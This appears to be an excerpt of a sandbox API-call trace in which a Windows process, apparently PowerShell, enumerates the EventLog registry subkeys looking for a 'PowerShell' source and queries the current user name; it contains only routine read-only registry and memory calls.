	[0669.545] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0669.545] CoTaskMemFree (pv=0x3d5480) 
	[0669.545] CoTaskMemFree (pv=0x0) 
	[0669.545] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x304) returned 0x0
	[0669.545] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.545] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x31c) returned 0x0
	[0669.545] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.545] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x328) returned 0x0
	[0669.546] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.546] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x32c) returned 0x0
	[0669.546] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.546] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x330) returned 0x0
	[0669.546] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.546] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x334) returned 0x0
	[0669.546] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.546] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x338) returned 0x0
	[0669.546] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.547] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x33c) returned 0x0
	[0669.547] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x0) returned 0x2
	[0669.547] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x340) returned 0x0
	[0669.547] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2b8 | out: phkResult=0x26d2b8*=0x344) returned 0x0
	[0669.547] RegCloseKey (hKey=0x344) returned 0x0
	[0669.547] RegCloseKey (hKey=0x300) returned 0x0
	[0669.548] RegCloseKey (hKey=0x340) returned 0x0
	[0669.564] CoTaskMemAlloc (cb=0x804) returned 0x1ba76080
	[0669.565] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba76080, nSize=0x26d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d4c8) returned 0x1
	[0669.566] CoTaskMemFree (pv=0x1ba76080) 
	[0669.567] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0669.567] GetUserNameW (in: lpBuffer=0x3d5480, pcbBuffer=0x26d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d508) returned 1
	[0669.568] CoTaskMemFree (pv=0x3d5480) 
	[0671.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d208 | out: phkResult=0x26d208*=0x348) returned 0x0
	[0671.259] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.259] CoTaskMemFree (pv=0x0) 
	[0671.259] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.259] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.259] CoTaskMemFree (pv=0x3d5480) 
	[0671.259] CoTaskMemFree (pv=0x0) 
	[0671.259] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.259] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.259] CoTaskMemFree (pv=0x3d5480) 
	[0671.259] CoTaskMemFree (pv=0x0) 
	[0671.259] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.259] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.259] CoTaskMemFree (pv=0x3d5480) 
	[0671.259] CoTaskMemFree (pv=0x0) 
	[0671.259] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.259] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.260] CoTaskMemFree (pv=0x3d5480) 
	[0671.260] CoTaskMemFree (pv=0x0) 
	[0671.260] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.260] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.260] CoTaskMemFree (pv=0x3d5480) 
	[0671.260] CoTaskMemFree (pv=0x0) 
	[0671.260] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.260] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.260] CoTaskMemFree (pv=0x3d5480) 
	[0671.260] CoTaskMemFree (pv=0x0) 
	[0671.260] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.260] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.260] CoTaskMemFree (pv=0x3d5480) 
	[0671.260] CoTaskMemFree (pv=0x0) 
	[0671.260] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.260] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.260] CoTaskMemFree (pv=0x3d5480) 
	[0671.261] CoTaskMemFree (pv=0x0) 
	[0671.261] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.261] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.261] CoTaskMemFree (pv=0x3d5480) 
	[0671.261] CoTaskMemFree (pv=0x0) 
	[0671.261] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x34c) returned 0x0
	[0671.261] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.261] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x350) returned 0x0
	[0671.261] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.261] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x354) returned 0x0
	[0671.261] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x358) returned 0x0
	[0671.262] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x35c) returned 0x0
	[0671.262] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x360) returned 0x0
	[0671.262] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x364) returned 0x0
	[0671.262] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.263] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x368) returned 0x0
	[0671.263] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.263] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x36c) returned 0x0
	[0671.263] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x370) returned 0x0
	[0671.263] RegCloseKey (hKey=0x370) returned 0x0
	[0671.263] RegCloseKey (hKey=0x348) returned 0x0
	[0671.264] RegCloseKey (hKey=0x36c) returned 0x0
	[0671.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d208 | out: phkResult=0x26d208*=0x36c) returned 0x0
	[0671.268] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.268] CoTaskMemFree (pv=0x0) 
	[0671.268] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.268] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.268] CoTaskMemFree (pv=0x3d5480) 
	[0671.269] CoTaskMemFree (pv=0x0) 
	[0671.269] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.269] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.269] CoTaskMemFree (pv=0x3d5480) 
	[0671.269] CoTaskMemFree (pv=0x0) 
	[0671.269] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.269] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.269] CoTaskMemFree (pv=0x3d5480) 
	[0671.269] CoTaskMemFree (pv=0x0) 
	[0671.269] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.269] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.269] CoTaskMemFree (pv=0x3d5480) 
	[0671.269] CoTaskMemFree (pv=0x0) 
	[0671.269] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.269] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.270] CoTaskMemFree (pv=0x3d5480) 
	[0671.270] CoTaskMemFree (pv=0x0) 
	[0671.270] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.270] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.270] CoTaskMemFree (pv=0x3d5480) 
	[0671.270] CoTaskMemFree (pv=0x0) 
	[0671.270] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.270] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.270] CoTaskMemFree (pv=0x3d5480) 
	[0671.270] CoTaskMemFree (pv=0x0) 
	[0671.270] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.270] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.270] CoTaskMemFree (pv=0x3d5480) 
	[0671.270] CoTaskMemFree (pv=0x0) 
	[0671.270] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.270] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3d5480, lpcchName=0x26d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.271] CoTaskMemFree (pv=0x3d5480) 
	[0671.271] CoTaskMemFree (pv=0x0) 
	[0671.271] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x348) returned 0x0
	[0671.271] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.271] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x370) returned 0x0
	[0671.271] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.271] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x374) returned 0x0
	[0671.271] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.271] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x378) returned 0x0
	[0671.271] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.272] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x37c) returned 0x0
	[0671.272] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.272] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x380) returned 0x0
	[0671.272] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.272] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x384) returned 0x0
	[0671.272] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.272] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x388) returned 0x0
	[0671.272] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x0) returned 0x2
	[0671.272] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x38c) returned 0x0
	[0671.273] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x390) returned 0x0
	[0671.273] RegCloseKey (hKey=0x390) returned 0x0
	[0671.273] RegCloseKey (hKey=0x36c) returned 0x0
	[0671.273] RegCloseKey (hKey=0x38c) returned 0x0
	[0671.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1d8 | out: phkResult=0x26d1d8*=0x38c) returned 0x0
	[0671.275] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d14c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d148*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.275] CoTaskMemFree (pv=0x0) 
	[0671.275] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.275] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.275] CoTaskMemFree (pv=0x3d5480) 
	[0671.275] CoTaskMemFree (pv=0x0) 
	[0671.275] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.275] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.275] CoTaskMemFree (pv=0x3d5480) 
	[0671.275] CoTaskMemFree (pv=0x0) 
	[0671.275] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.275] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.275] CoTaskMemFree (pv=0x3d5480) 
	[0671.275] CoTaskMemFree (pv=0x0) 
	[0671.275] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.276] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.276] CoTaskMemFree (pv=0x3d5480) 
	[0671.276] CoTaskMemFree (pv=0x0) 
	[0671.276] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.276] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.276] CoTaskMemFree (pv=0x3d5480) 
	[0671.276] CoTaskMemFree (pv=0x0) 
	[0671.276] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.276] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.276] CoTaskMemFree (pv=0x3d5480) 
	[0671.276] CoTaskMemFree (pv=0x0) 
	[0671.276] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.276] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.276] CoTaskMemFree (pv=0x3d5480) 
	[0671.276] CoTaskMemFree (pv=0x0) 
	[0671.276] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.277] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.277] CoTaskMemFree (pv=0x3d5480) 
	[0671.277] CoTaskMemFree (pv=0x0) 
	[0671.277] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0671.277] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x3d5480, lpcchName=0x26d1d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d1d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0671.277] CoTaskMemFree (pv=0x3d5480) 
	[0671.277] CoTaskMemFree (pv=0x0) 
